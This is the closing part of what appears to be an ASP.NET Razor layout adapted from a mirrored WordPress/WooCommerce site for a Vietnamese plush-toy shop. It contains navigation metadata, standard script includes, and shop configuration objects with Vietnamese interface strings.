                {"@context":"https:\/\/schema.org","@graph":[{"@context":"https:\/\/schema.org","@type":"SiteNavigationElement","id":"site-navigation","name":"Trang ch\u1ee7","url":"https:\/\/gausaigon.com\/"},{"@context":"https:\/\/schema.org","@type":"SiteNavigationElement","id":"site-navigation","name":"G\u1ea5u b\u00f4ng teddy","url":"https:\/\/gausaigon.com\/danh-muc\/gau-bong-teddy\/"},{"@context":"https:\/\/schema.org","@type":"SiteNavigationElement","id":"site-navigation","name":"G\u1ed1i \u00f4m","url":"https:\/\/gausaigon.com\/danh-muc\/goi-om\/"},{"@context":"https:\/\/schema.org","@type":"SiteNavigationElement","id":"site-navigation","name":"G\u1ed1i \u00f4m c\u1ed5 ch\u1eef U","url":"https:\/\/gausaigon.com\/danh-muc\/goi-om\/goi-om-co-chu-u\/"},{"@context":"https:\/\/schema.org","@type":"SiteNavigationElement","id":"site-navigation","name":"G\u1ed1i t\u1ef1a l\u01b0ng","url":"https:\/\/gausaigon.com\/danh-muc\/goi-om\/goi-tua-lung\/"},{"@context":"https:\/\/schema.org","@type":"SiteNavigationElement","id":"site-navigation","name":"Th\u00fa b\u00f4ng ho\u1ea1t h\u00ecnh","url":"https:\/\/gausaigon.com\/danh-muc\/thu-bong-hoat-hinh\/"},{"@context":"https:\/\/schema.org","@type":"SiteNavigationElement","id":"site-navigation","name":"G\u1ea5u b\u00f4ng Doremon","url":"https:\/\/gausaigon.com\/danh-muc\/thu-bong-hoat-hinh\/gau-bong-doremon\/"},{"@context":"https:\/\/schema.org","@type":"SiteNavigationElement","id":"site-navigation","name":"G\u1ea5u b\u00f4ng Hello Kitty","url":"https:\/\/gausaigon.com\/danh-muc\/thu-bong-hoat-hinh\/gau-bong-hello-kitty\/"},{"@context":"https:\/\/schema.org","@type":"SiteNavigationElement","id":"site-navigation","name":"G\u1ea5u b\u00f4ng Pikachu","url":"https:\/\/gausaigon.com\/danh-muc\/thu-bong-hoat-hinh\/gau-bong-pikachu\/"},{"@context":"https:\/\/schema.org","@type":"SiteNavigationElement","id":"site-navigation","name":"G\u1ea5u b\u00f4ng Totoro","url":"https:\/\/gausaigon.com\/danh-muc\/thu-bong-hoat-hinh\/gau-bong-totoro\/"},{"@context":"https:\/\/schema.org","@type":"SiteNavigationElement","id":"site-navigation","name":"G\u1ea5u brown","url":"https:\/\/gausaigon.com\/danh-muc\/thu-bong-hoat-hinh\/gau-brown\/"},{"@context":"https:\/\/schema.org","@type":"SiteNavigationElement","id":"site-navigation","name":"Heo b\u00f4ng","url":"https:\/\/gausaigon.com\/danh-muc\/thu-bong-hoat-hinh\/heo-bong\/"},{"@context":"https:\/\/schema.org","@type":"SiteNavigationElement","id":"site-navigation","name":"Chuy\u1ec7n c\u1ee7a g\u1ea5u","url":"https:\/\/gausaigon.com\/category\/chuyen-cua-gau\/"},{"@context":"https:\/\/schema.org","@type":"SiteNavigationElement","id":"site-navigation","name":"Tin t\u1ee9c t\u1ed5ng h\u1ee3p","url":"https:\/\/gausaigon.com\/category\/tin-tuc-tong-hop\/"},{"@context":"https:\/\/schema.org","@type":"SiteNavigationElement","id":"site-navigation","name":"Li\u00ean h\u1ec7","url":"https:\/\/gausaigon.com\/lien-he\/"}]}
            </script>
        <script type="application/ld+json">
                {"@context":"https:\/\/schema.org","@type":"WebSite","name":"G\u1ea5u S\u00e0i G\u00f2n","url":"https:\/\/gausaigon.com","potentialAction":[{"@type":"SearchAction","target":"https:\/\/gausaigon.com\/?s={search_term_string}","query-input":"required name=search_term_string"}]}
            </script>*@
        <!--[if IE]><script src="//cdnjs.cloudflare.com/ajax/libs/html5shiv/3.6.1/html5shiv.js"></script><![endif]-->
        <!--[if IE]><script>var head=document.getElementsByTagName('head')[0],style=document.createElement('style');style.type='text/css';style.styleSheet.cssText=':before,:after{content:none !important';head.appendChild(style);setTimeout(function(){head.removeChild(style);}, 0);</script><![endif]-->
        <!--[if IE]><script defer src="//gausaigon.com/wp-content/cache/wpfc-minified/q7a55ab0/5ugl9.js"></script><![endif]-->

        <script src="/Content/asset/js/jquery-1.10.2.js" type="text/javascript"></script>

        <script src="/Content/asset/js/validateForm.js"></script>
        <script src="/Scripts/jquery.twbsPagination.js"></script>
        <script src="https://cdn.jsdelivr.net/npm/jquery-validation@1.19.1/dist/jquery.validate.js"></script>
        <script src="~/Content/asset/js/bootstrap.js" type="text/javascript"></script>
        <script src="~/Content/asset/js/login-register.js" type="text/javascript"></script>
        <script src='/Content/wp-content/cache/wpfc-minified/2p8abx11/5ugl9.js' type="text/javascript"></script>
        <script>
        $(document).ready(function () {

                document.querySelector('#coutCart').dataset.iconLabel = @Session["coutCart"];


        });
        </script>
        <script defer src='/Content/wp-content/cache/wpfc-minified/g3bsihqi/hn0mt.js' type="text/javascript"></script>
        <script id="lazy-load-icons">
            var fl_icons = document.createElement('link');
            fl_icons.rel = 'stylesheet';
            fl_icons.href = '/Content/wp-content/themes/flatsome/assets/css/fl-icons.css';
            fl_icons.type = 'text/css';
            var fl_icons_insert = document.getElementsByTagName('link')[0];
            fl_icons_insert.parentNode.insertBefore(fl_icons, fl_icons_insert);
        </script>
        <script>
            window.fbAsyncInit = function () {
                FB.init({
                    xfbml: true,
                    version: 'v3.2'
                });
            };

            (function (d, s, id) {
                var js, fjs = d.getElementsByTagName(s)[0];
                if (d.getElementById(id)) return;
                js = d.createElement(s); js.id = id;
                js.src = '../connect.facebook.net/vi_VN/sdk/xfbml.customerchat.js';
                fjs.parentNode.insertBefore(js, fjs);
            }(document, 'script', 'facebook-jssdk'));
        </script>
        <script>
            var c = document.body.className;
            c = c.replace(/woocommerce-no-js/, 'woocommerce-js');
            document.body.className = c;</script>
        <script>var wc_product_block_data = JSON.parse(decodeURIComponent('%7B%22min_columns%22%3A1%2C%22max_columns%22%3A6%2C%22default_columns%22%3A3%2C%22min_rows%22%3A1%2C%22max_rows%22%3A6%2C%22default_rows%22%3A1%2C%22thumbnail_size%22%3A300%2C%22placeholderImgSrc%22%3A%22https%3A%5C%2F%5C%2Fgausaigon.com%5C%2Fwp-content%5C%2Fuploads%5C%2Fwoocommerce-placeholder-247x300.png%22%2C%22min_height%22%3A500%2C%22default_height%22%3A500%2C%22isLargeCatalog%22%3Afalse%2C%22limitTags%22%3Afalse%2C%22hasTags%22%3Atrue%2C%22productCategories%22%3A%5B%7B%22term_id%22%3A76%2C%22name%22%3A%22Uncategorized%22%2C%22slug%22%3A%22uncategorized%22%2C%22term_group%22%3A0%2C%22term_taxonomy_id%22%3A76%2C%22taxonomy%22%3A%22product_cat%22%2C%22description%22%3A%22%22%2C%22parent%22%3A0%2C%22count%22%3A0%2C%22filter%22%3A%22raw%22%2C%22link%22%3A%22https%3A%5C%2F%5C%2Fgausaigon.com%5C%2Fdanh-muc%5C%2Funcategorized%5C%2F%22%7D%2C%7B%22term_id%22%3A21%2C%22name%22%3A%22G%5Cu1ea5u%20b%5Cu00f4ng%20Doremon%22%2C%22slug%22%3A%22gau-bong-doremon%22%2C%22term_group%22%3A0%2C%22term_taxonomy_id%22%3A21%2C%22taxonomy%22%3A%22product_cat%22%2C%22description%22%3A%22%22%2C%22parent%22%3A19%2C%22count%22%3A0%2C%22filter%22%3A%22raw%22%2C%22link%22%3A%22https%3A%5C%2F%5C%2Fgausaigon.com%5C%2Fdanh-muc%5C%2Fthu-bong-hoat-hinh%5C%2Fgau-bong-doremon%5C%2F%22%7D%2C%7B%22term_id%22%3A23%2C%22name%22%3A%22G%5Cu1ea5u%20b%5Cu00f4ng%20Hello%20Kitty%22%2C%22slug%22%3A%22gau-bong-hello-kitty%22%2C%22term_group%22%3A0%2C%22term_taxonomy_id%22%3A23%2C%22taxonomy%22%3A%22product_cat%22%2C%22description%22%3A%22%22%2C%22parent%22%3A19%2C%22count%22%3A0%2C%22filter%22%3A%22raw%22%2C%22link%22%3A%22https%3A%5C%2F%5C%2Fgausaigon.com%5C%2Fdanh-muc%5C%2Fthu-bong-hoat-hinh%5C%2Fgau-bong-hello-kitty%5C%2F%22%7D%2C%7B%22term_id%22%3A24%2C%22name%22%3A%22G%5Cu1ea5u%20b%5Cu00f4ng%20Pikachu%22%2C%22slug%22%3A%22gau-bong-pikachu%22%2C%22term_group%22%3A0%2C%22term_taxonomy_id%22%3A24%2C%22taxonomy%22%3A%22product_cat%22%2C%22description%22%3A%22%22%2C%22parent%22%3A19%2C%22count%22%3A0%2C%22filter%22%3A%22raw%22%2C%22link%22%3A%22https%3A%5C%2F%5C%2Fgausaigon.com%5C%2Fdanh-muc%5C%2Fthu-bong-hoat-hinh%5C%2Fgau-bong-pikachu%5C%2F%22%7D%2C%7B%22term_id%22%3A15%2C%22name%22%3A%22G%5Cu1ea5u%20b%5Cu00f4ng%20teddy%22%2C%22slug%22%3A%22gau-bong-teddy%22%2C%22term_group%22%3A0%2C%22term_taxonomy_id%22%3A15%2C%22taxonomy%22%3A%22product_cat%22%2C%22description%22%3A%22%22%2C%22parent%22%3A0%2C%22count%22%3A20%2C%22filter%22%3A%22raw%22%2C%22link%22%3A%22https%3A%5C%2F%5C%2Fgausaigon.com%5C%2Fdanh-muc%5C%2Fgau-bong-teddy%5C%2F%22%7D%2C%7B%22term_id%22%3A20%2C%22name%22%3A%22G%5Cu1ea5u%20b%5Cu00f4ng%20Totoro%22%2C%22slug%22%3A%22gau-bong-totoro%22%2C%22term_group%22%3A0%2C%22term_taxonomy_id%22%3A20%2C%22taxonomy%22%3A%22product_cat%22%2C%22description%22%3A%22%22%2C%22parent%22%3A19%2C%22count%22%3A0%2C%22filter%22%3A%22raw%22%2C%22link%22%3A%22https%3A%5C%2F%5C%2Fgausaigon.com%5C%2Fdanh-muc%5C%2Fthu-bong-hoat-hinh%5C%2Fgau-bong-totoro%5C%2F%22%7D%2C%7B%22term_id%22%3A25%2C%22name%22%3A%22G%5Cu1ea5u%20brown%22%2C%22slug%22%3A%22gau-brown%22%2C%22term_group%22%3A0%2C%22term_taxonomy_id%22%3A25%2C%22taxonomy%22%3A%22product_cat%22%2C%22description%22%3A%22%22%2C%22parent%22%3A19%2C%22count%22%3A0%2C%22filter%22%3A%22raw%22%2C%22link%22%3A%22https%3A%5C%2F%5C%2Fgausaigon.com%5C%2Fdanh-muc%5C%2Fthu-bong-hoat-hinh%5C%2Fgau-brown%5C%2F%22%7D%2C%7B%22term_id%22%3A26%2C%22name%22%3A%22G%5Cu1ed1i%20%5Cu00f4m%22%2C%22slug%22%3A%22goi-om%22%2C%22term_group%22%3A0%2C%22term_taxonomy_id%22%3A26%2C%22taxonomy%22%3A%22product_cat%22%2C%22description%22%3A%22%22%2C%22parent%22%3A0%2C%22count%22%3A0%2C%22filter%22%3A%22raw%22%2C%22link%22%3A%22https%3A%5C%2F%5C%2Fgausaigon.com%5C%2Fdanh-muc%5C%2Fgoi-om%5C%2F%22%7D%2C%7B%22term_id%22%3A28%2C%22name%22%3A%22G%5Cu1ed1i%20%5Cu00f4m%20c%5Cu1ed5%20ch%5Cu1eef%20U%22%2C%22slug%22%3A%22goi-om-co-chu-u%22%2C%22term_group%22%3A0%2C%22term_taxonomy_id%22%3A28%2C%22taxonomy%22%3A%22product_cat%22%2C%22description%22%3A%22%22%2C%22parent%22%3A26%2C%22count%22%3A0%2C%22filter%22%3A%22raw%22%2C%22link%22%3A%22https%3A%5C%2F%5C%2Fgausaigon.com%5C%2Fdanh-muc%5C%2Fgoi-om%5C%2Fgoi-om-co-chu-u%5C%2F%22%7D%2C%7B%22term_id%22%3A27%2C%22name%22%3A%22G%5Cu1ed1i%20t%5Cu1ef1a%20l%5Cu01b0ng%22%2C%22slug%22%3A%22goi-tua-lung%22%2C%22term_group%22%3A0%2C%22term_taxonomy_id%22%3A27%2C%22taxonomy%22%3A%22product_cat%22%2C%22description%22%3A%22%22%2C%22parent%22%3A26%2C%22count%22%3A0%2C%22filter%22%3A%22raw%22%2C%22link%22%3A%22https%3A%5C%2F%5C%2Fgausaigon.com%5C%2Fdanh-muc%5C%2Fgoi-om%5C%2Fgoi-tua-lung%5C%2F%22%7D%2C%7B%22term_id%22%3A22%2C%22name%22%3A%22Heo%20b%5Cu00f4ng%22%2C%22slug%22%3A%22heo-bong%22%2C%22term_group%22%3A0%2C%22term_taxonomy_id%22%3A22%2C%22taxonomy%22%3A%22product_cat%22%2C%22description%22%3A%22%22%2C%22parent%22%3A19%2C%22count%22%3A1%2C%22filter%22%3A%22raw%22%2C%22link%22%3A%22https%3A%5C%2F%5C%2Fgausaigon.com%5C%2Fdanh-muc%5C%2Fthu-bong-hoat-hinh%5C%2Fheo-bong%5C%2F%22%7D%2C%7B%22term_id%22%3A19%2C%22name%22%3A%22Th%5Cu00fa%20b%5Cu00f4ng%20ho%5Cu1ea1t%20h%5Cu00ecnh%22%2C%22slug%22%3A%22thu-bong-hoat-hinh%22%2C%22term_group%22%3A0%2C%22term_taxonomy_id%22%3A19%2C%22taxonomy%22%3A%22product_cat%22%2C%22description%22%3A%22%22%2C%22parent%22%3A0%2C%22count%22%3A1%2C%22filter%22%3A%22raw%22%2C%22link%22%3A%22https%3A%5C%2F%5C%2Fgausaigon.com%5C%2Fdanh-muc%5C%2Fthu-bong-hoat-hinh%5C%2F%22%7D%5D%2C%22homeUrl%22%3A%22https%3A%5C%2F%5C%2Fgausaigon.com%5C%2F%22%7D'));</script>
        <script>var _wpUtilSettings = { "ajax": { "url": "\/wp-admin\/admin-ajax.php" } };</script>
        <script>var wc_add_to_cart_variation_params = { "wc_ajax_url": "\/?wc-ajax=%%endpoint%%", "i18n_no_matching_variations_text": "R\u1ea5t ti\u1ebfc, kh\u00f4ng c\u00f3 s\u1ea3n ph\u1ea9m n\u00e0o ph\u00f9 h\u1ee3p v\u1edbi l\u1ef1a ch\u1ecdn c\u1ee7a b\u1ea1n. H\u00e3y ch\u1ecdn m\u1ed9t ph\u01b0\u01a1ng th\u1ee9c k\u1ebft h\u1ee3p kh\u00e1c.", "i18n_make_a_selection_text": "Ch\u1ecdn c\u00e1c t\u00f9y ch\u1ecdn cho s\u1ea3n ph\u1ea9m tr\u01b0\u1edbc khi cho s\u1ea3n ph\u1ea9m v\u00e0o gi\u1ecf h\u00e0ng c\u1ee7a b\u1ea1n.", "i18n_unavailable_text": "R\u1ea5t ti\u1ebfc, s\u1ea3n ph\u1ea9m n\u00e0y hi\u1ec7n kh\u00f4ng t\u1ed3n t\u1ea1i. H\u00e3y ch\u1ecdn m\u1ed9t ph\u01b0\u01a1ng th\u1ee9c k\u1ebft h\u1ee3p kh\u00e1c." };</script>
        <script>var devvn_quickbuy_array = { "ajaxurl": "https:\/\/gausaigon.com\/wp-admin\/admin-ajax.php", "siteurl": "https:\/\/gausaigon.com", "popup_error": "\u0110\u1eb7t h\u00e0ng th\u1ea5t b\u1ea1i. Vui l\u00f2ng \u0111\u1eb7t h\u00e0ng l\u1ea1i. Xin c\u1ea3m \u01a1n!", "out_of_stock_mess": "H\u1ebft h\u00e0ng!", "price_decimal": ".", "num_decimals": "0", "price_thousand": ",", "currency_format": "\u20ab", "qty_text": "S\u1ed1 l\u01b0\u1ee3ng", "name_text": "H\u1ecd v\u00e0 t\u00ean l\u00e0 b\u1eaft bu\u1ed9c", "phone_text": "S\u1ed1 \u0111i\u1ec7n tho\u1ea1i l\u00e0 b\u1eaft bu\u1ed9c", "valid_phone_text": "Nh\u1eadp l\u1ea1i s\u1ed1 \u0111i\u1ec7n tho\u1ea1i l\u00e0 b\u1eaft bu\u1ed9c", "valid_phone_text_equalto": "Vui l\u00f2ng nh\u1eadp l\u1ea1i c\u00f9ng s\u1ed1 \u0111i\u1ec7n tho\u1ea1i", "email_text": "Email l\u00e0 b\u1eaft bu\u1ed9c", "quan_text": "Qu\u1eadn huy\u1ec7n l\u00e0 b\u1eaft bu\u1ed9c", "xa_text": "X\u00e3\/Ph\u01b0\u1eddng l\u00e0 b\u1eaft bu\u1ed9c", "address_text": "S\u1ed1 nh\u00e0, t\u00ean \u0111\u01b0\u1eddng l\u00e0 b\u1eaft bu\u1ed9c" };</script>
        <script>var wc_add_to_cart_params = { "ajax_url": "\/wp-admin\/admin-ajax.php", "wc_ajax_url": "\/?wc-ajax=%%endpoint%%", "i18n_view_cart": "Xem gi\u1ecf h\u00e0ng", "cart_url": "https:\/\/gausaigon.com\/gio-hang\/", "is_cart": "", "cart_redirect_after_add": "no" };</script>
        <script>var woocommerce_params = { "ajax_url": "\/wp-admin\/admin-ajax.php", "wc_ajax_url": "\/?wc-ajax=%%endpoint%%" };</script>
        <script>var wc_cart_fragments_params = { "ajax_url": "\/wp-admin\/admin-ajax.php", "wc_ajax_url": "\/?wc-ajax=%%endpoint%%", "cart_hash_key": "wc_cart_hash_870cabdcf3858b345348eddd5c8cd81a", "fragment_name": "wc_fragments_870cabdcf3858b345348eddd5c8cd81a", "request_timeout": "5000" };</script>
        <script>var ghtk_array = { "admin_ajax": "https:\/\/gausaigon.com\/wp-admin\/admin-ajax.php", "home_url": "https:\/\/gausaigon.com", "formatNoMatches": "Kh\u00f4ng c\u00f3 gi\u00e1 tr\u1ecb" };</script>
        <script>var flatsomeVars = { "ajaxurl": "https:\/\/gausaigon.com\/wp-admin\/admin-ajax.php", "rtl": "", "sticky_height": "70", "user": { "can_edit_pages": false } };</script>
        <script>var flatsome_infinite_scroll = { "scroll_threshold": "400", "fade_in_duration": "300", "type": "spinner", "list_style": "grid", "history": "push" };</script>
        <script>var _zxcvbnSettings = { "src": "https:\/\/gausaigon.com\/wp-includes\/js\/zxcvbn.min.js" };</script>
        <script>var pwsL10n = { "unknown": "M\u1eadt kh\u1ea9u m\u1ea1nh kh\u00f4ng x\u00e1c \u0111\u1ecbnh", "short": "R\u1ea5t y\u1ebfu", "bad": "Y\u1ebfu", "good": "Trung b\u00ecnh", "strong": "M\u1ea1nh", "mismatch": "M\u1eadt kh\u1ea9u kh\u00f4ng kh\u1edbp" };</script>
        <script>var wc_password_strength_meter_params = { "min_password_strength": "3", "stop_checkout": "", "i18n_password_error": "Vui l\u00f2ng nh\u1eadp m\u1eadt kh\u1ea9u kh\u00f3 h\u01a1n.", "i18n_password_hint": "G\u1ee3i \u00fd: M\u1eadt kh\u1ea9u ph\u1ea3i c\u00f3 \u00edt nh\u1ea5t 12 k\u00fd t\u1ef1. \u0110\u1ec3 n\u00e2ng cao \u0111\u1ed9 b\u1ea3o m\u1eadt, s\u1eed d\u1ee5ng ch\u1eef in hoa, in th\u01b0\u1eddng, ch\u1eef s\u1ed1 v\u00e0 c\u00e1c k\u00fd t\u1ef1 \u0111\u1eb7c bi\u1ec7t nh\u01b0 ! \" ? $ % ^ &)." };</script>
        <script>(function (html) { html.className = html.className.replace(/\bno-js\b/, 'js') })(document.documentElement);</script>
        @RenderSection("js", required: false)
    </body>
    <!-- Mirrored from gausaigon.com/ by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 11 Sep 2019 08:52:50 GMT -->
</html><!-- WP Fastest Cache file was created in 1.2054879665375 seconds, on 11-09-19 15:22:36 --><!-- via php -->
